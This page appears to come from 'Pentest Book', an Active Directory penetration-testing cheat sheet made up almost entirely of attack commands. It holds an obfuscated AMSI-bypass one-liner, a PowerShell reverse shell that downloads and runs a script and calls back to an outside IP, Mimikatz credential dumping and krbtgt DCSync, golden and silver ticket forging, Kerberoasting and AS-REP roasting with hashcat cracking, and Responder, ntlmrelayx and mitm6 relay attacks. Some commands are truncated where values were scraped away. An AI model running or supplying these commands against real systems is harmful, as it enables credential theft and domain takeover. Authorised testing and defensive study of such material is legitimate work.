Pentest Book


Basic Active Directory terms


An agent represented by a user account.
  • Regular user accounts (used by employees or for specific tasks such as backups)
  • Computer accounts (end with $). Computers in AD are a subclass of users.


  • Identified by an SPN, which indicates the service name and class, the owner and the host computer.
  • Is executed on a computer (the host of the service) as a process.
  • Services (like any process) run in the context of a user account, with the privileges and permissions of that user.
  • The SPNs of the services owned by a user are stored in the ServicePrincipalName attribute of that account.
  • Usually a Domain Admin or similar role is required to modify the SPNs of a user.


# Anonymous Credential LDAP Dumping:
ldapsearch -LLL -x -H ldap:// -b '' -s base '(objectclass=*)'
# Impacket (Must have valid credentials) -all -dc-ip
# Impacket
/usr/share/doc/python3-impacket/examples/ username:[email protected]
# Windapsearch:
python3 -d host.domain -u domain\\ldapbind -p PASSWORD -U
# Go version
cme smb IP -u '' -p '' --users --shares
# BloodHound
Import-Module .\sharphound.ps1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
# (no shell needed) remote, ldap auth
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <> -c all
# BloodHound Cheatsheet
# Bloodhound raw queries
# Bloodhound complements
# Get BH data from LDAP
# Rubeus
## ASREProasting:
Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
## Kerberoasting:
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
## Pass the key (PTK):
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Using the ticket on a Windows target:
Rubeus.exe ptt /ticket:<ticket_kirbi_file>
# Password Spraying tool
# Kerberoast
# Powerview
# AD Cheatsheets
# References:

Common vulns

# Users having rights to add computers to domain
add-computer -domainname org.local -Credential ORG\john -restart -force
# AdminCount attribute set on common users
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
Import-Module ActiveDirectory
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount
# High number of users in privileged groups
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
- Linux:
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I -U "john"%"pass123"
# Service accounts being members of Domain Admins
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
# Excessive privileges allowing for shadow Domain Admins
# Service accounts vulnerable to Kerberoasting -request
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt
# Users with non-expiring passwords
python -u\john -p pass123 -d ';'
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }
# Users with password not required
python -u\john -p pass123 -d ';'
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -Filter {UserAccountControl -band 0x0020}
# Storing passwords using reversible encryption
mimikatz # lsadump::dcsync / /user:poorjohn
# Storing passwords using LM hashes (entries whose LM field is not the empty-LM value aad3b435b51404eeaad3b435b51404ee)
- In NTDS.dit
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt
# Service accounts vulnerable to AS-REP roasting -usersfile userlist.txt -format hashcat -no-pass -request -format hashcat
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
- PS
Import-Module ActiveDirectory
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
# Weak domain password policy
net accounts /domain
polenum --username john --password pass123 --domain
enum4linux -P -u john -p pass123 -w dom.local
# Inactive domain accounts
python -u\john -p pass123 -d ';'
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'
# Privileged users with password reset overdue
python -u\john -p pass123 -d ';'
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
# Users with a weak password
$a = [adsisearcher]"(&(objectCategory=person)(objectClass=user))"
$a.PropertiesToLoad.add("samaccountname") | out-null
$a.PageSize = 1
$a.FindAll() | % { echo $ } > users.txt
Import-Module ./adlogin.ps1
adlogin users.txt password123
# Credentials in SYSVOL and Group Policy Preferences (GPP)
findstr /s /n /i /p password \\\sysvol\\*
mount.cifs -o,username=john,password="[email protected]" // /mnt
grep -ir 'password' /mnt

Quick tips

# Amsi bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Powershell Execution policy Bypass
powershell -ep bypass
# To pipe the output of the first command into the second command, use this PowerShell technique
# %{} is an alias for ForEach-Object{}
# ?{} is an alias for Where-Object{}
# $_ is the current pipeline object
<First command> | %{<Second command> -<argument> $_}
# To filter objects on a property value, use this technique after a pipe.
?{$_.<object> -eq '<value>'}
# Find local admin access
# Get Domain sid
Arguments -Domain "domain name"
# Get DC
Arguments -Domain "domain name"
# Get users in current domain
Arguments -UserName "username"
# Get user properties
Arguments -Properties pwdlastset
# Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
# Get all computers
Get-NetComputer -FullData
Other arguments: -OperatingSystem -Ping -FullData
# Get groups
Arguments -FullData -Domain
# Get members of a particular group
Get-NetGroupMember -GroupName "Domain Admins"
# Group Policies
Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup
# Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName
# Get OUs
Get-NetOU -FullData Get-NetGPO -GPOname
# Mapping forest
Get-NetForest -Verbose
Get-NetForestDomain -Verbose
# Mapping trust
Arguments -Domain
Get-NetForestDomain -Verbose | Get-NetDomainTrust
# Finding Constrained Delegation
Get-DomainUser -TrustedToAuth (PowerView Dev.)
# Finding UnConstrained Delegation
Get-NetComputer -UnConstrained
# Get ACLs
Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
# Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
# Reverse Shell
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
powershell.exe iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443
# Make ntlm ps-session
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'
# Dump creds
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"'
(DCSync requires 3 permissions)
# Tickets
Inject ticket:
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi tkt>"'
Export tickets:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
# Golden tkt
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Silver tkt
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'
# TGT tkt
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>
# TGS tkt
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>

Relay attacks flow

I’m bringing relaying back: A comprehensive guide on relaying anno 2022 - TrustedSec


# First just listen
sudo responder -I eth0 -A
# Check which hosts have SMB signing disabled (enforcing SMB signing on these hosts is the mitigation for the relay attacks below)
crackmapexec smb --gen-relay-list smb_sign_disabled.txt

Basic attack A

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt
# Then start responder in attack mode
responder -rdP -I eth0
# Cracking NTLMv2
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force

Basic attack B (socks proxy)

# Modify responder.cfg to disable HTTP and SMB servers
# Start against smb_sign_disabled.txt hosts list -tf smb_sign_disabled.txt -smb2support -socks
# Edit proxychains4.conf to:
socks4 1080
# Run secretsdump
proxychains dcname\user:[email protected]
# Even smbclient
proxychains dcname\user:[email protected]

LDAP Enum -t ldap:// -smb2support

IPv6 DNS Takeover via Mitm6

git clone
pip install mitm6
mitm6 -d
# While the previous step is running, in another terminal run -6 -t ldaps:// -wh -l dir

LDAP complete guide

LDAPSearch Reference

AD Mindmap

DACL mindmap
